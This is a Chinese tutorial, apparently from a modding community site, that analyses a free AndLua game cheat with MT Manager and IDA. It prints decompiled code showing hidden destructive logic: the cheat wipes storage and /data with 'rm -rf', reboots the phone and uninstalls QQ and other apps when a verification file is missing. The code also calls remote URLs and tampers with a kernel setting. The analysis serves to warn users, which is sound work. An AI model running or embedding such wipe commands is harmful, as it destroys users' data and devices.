【MT软件修改】某AndLua游戏辅助分析

所需工具：

MT管理器

聪明的大脑文章源自灵鲨社区-https://www.0s52.com/jc/mtjc/8593.html

勤劳的双手文章源自灵鲨社区-https://www.0s52.com/jc/mtjc/8593.html

 文章源自灵鲨社区-https://www.0s52.com/jc/mtjc/8593.html

注意：本站只提供教程，不提供任何成品+工具+游戏链接，仅限用于学习和研究。文章源自灵鲨社区-https://www.0s52.com/jc/mtjc/8593.html

 文章源自灵鲨社区-https://www.0s52.com/jc/mtjc/8593.html

教程如下：

近来有空闲，就下了一款某游戏免费辅助分析，打发时间。
辅助是官方加密，解密基本烂大街了，这一步略过，我们重点分析main.lua文件。文章源自灵鲨社区-https://www.0s52.com/jc/mtjc/8593.html

[php]os.execute("mkdir /storage/emulated/0/Android/data/com.tencent.mobileqq/Tencent/QQfile_recv/") -- 创建文件夹
io.open("/storage/emulated/0/Android/data/com.tencent.mobileqq/Tencent/QQfile_recv/bh.txt", "w") -- 创建bh.txt，根据后面二进制文件分析，bh.txt为重要验证文件[/php]文章源自灵鲨社区-https://www.0s52.com/jc/mtjc/8593.html

main.lua启动后，先创建文件夹以及bh.txt文件作为游戏验证文件。接下来是进行网络开关配置，以及记录点击量（进行装逼？)文章源自灵鲨社区-https://www.0s52.com/jc/mtjc/8593.html

[php]Http.get("https://sharechain.qq.com/d778eba3fa20bdd363b84f95988e0948", function(A0_29, A1_30) -- 网络开关配置
...
-- 记录启动量
Http.get("http://www.iyuji.cn/iyuji/s/a0NsM2U4SFV1WURNZ3BaSmNqTHZqZz09/1605429309623999", function(A0_31, A1_32)[/php]文章源自灵鲨社区-https://www.0s52.com/jc/mtjc/8593.html

之后就是一些网络检测和vpn检测，我们关注以下它的启动功能文章源自灵鲨社区-https://www.0s52.com/jc/mtjc/8593.html

[php]-- 启动 BH/A1 下的文件，下同
function A1.onClick()
if A1.checked then
ROOT = os.execute("su")
if ROOT == true then
os.execute("su")
_ENV["root执行"]("BH/A1", "开启成功")
else
_ENV["免root执行"]("BH/A1", "开启成功")
end
end
end[/php]

点击之后启动BH/A1文件，嗯，此为64位的可执行文件，也就是你们常说的二进制文件。
将A1文件拖入ida64，等反编译完成后定位到main函数，嗯。。。main函数一般都是可执行文件的启动函数。

[php]

int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [xsp+2Ch] [xbp+2Ch] BYREF
char *v5; // [xsp+30h] [xbp+30h]

if ( !fopen("/storage/emulated/0/Android/data/com.tencent.mobileqq/Tencent/QQfile_recv/bh.txt", "r") ) // 如果打开bh.txt失败，
{
rebootsystem(); // 重启手机
remove("/storage/emulated/0/Android"); // 删除SD卡下的Android文件夹，即app的数据目录
remove("/storage/emulated/0/iApp"); // 删除 SD卡下的 iApp 文件夹，暂未分析此文件夹用途
system("rm -rf /storage/emulated/0"); // 移除SD卡文件夹
system("rm -rf /data"); // 移除data文件夹，此辅助是root权限启动，理论是可以删除 data 文件夹的
uninstallapk("com.tencent.mobileqq"); // 卸载qq
uninstallapk("com.bairimeng.dmmdzz.m4399"); // 卸载软件
uninstallapk("com.aigz.cloudgame.cat"); // 卸载软件
printf(byte_6FA0);
exit(1);
}
killGG(); // 检测GG修改器，大体是遍历 /data/data/目录下的文件夹，与GG匹配
v5 = "com.bairimeng.dmmdzz.m4399";
BypassGameSafe(); //过检测？[/php]

我们分析一下BypassGameSafe();

[php]__int64 BypassGameSafe(void)
{
return system("echo 0 > /proc/sys/fs/inotify/max_user_watches");
}[/php]

就一个步骤，把0写入max_user_watches文件，修改系统文件，至于危害，不得而知。
总结，虽说此辅助属于免费，但是十几个可执行文件都加了格机代码，以及修改系统文件，稍有不慎，估计要重装手机系统了，当然，重装事小，要是手机里面有啥重要文件被格机那就搞笑了。